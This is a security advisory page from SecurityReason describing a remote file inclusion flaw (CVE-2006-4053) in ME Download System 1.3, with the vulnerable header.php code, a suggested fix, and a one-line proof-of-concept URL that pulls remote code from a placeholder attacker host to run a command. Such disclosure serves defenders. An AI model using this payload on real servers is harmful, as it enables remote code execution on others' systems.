|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1355 CVE : CVE-2006-4053 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : Philipp Niedziela Published : 11.08.2006
Advisory Text : +-------------------------------------------------------------------- + + ME Download System 1.3 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: ME Download System 1.3 + Venedor ...........: http://www.ehmig.net/ + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm + Contact ...........: webmaster[at]bb-pcsecurity[.]de http://www.bb-pcsecurity.de + Affected Files ....: templates/header.php + +-------------------------------------------------------------------- + + Code of /templates/header.php: + + ..... + <?php + include($Vb8878b936c2bd8ae0cab.'/settings_style.php'); + ..... + +-------------------------------------------------------------------- + + $Vb8878b936c2bd8ae0cab is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Include config-File in header.php: + +-------------------------------------------------------------------- + + PoC: + http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evils ite.com?cmd=ls + +-------------------------------------------------------------------- + + Notice: + Maybe there are more RFI-Vulns in other files, but it's very hard + to read this code. + + Venedor has been contacted, but I didn't received any answer. + +-------------------------------------------------------------------- + + Greets: + Krini Gonzales + +-------------------------[ E O F ]----------------------------------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |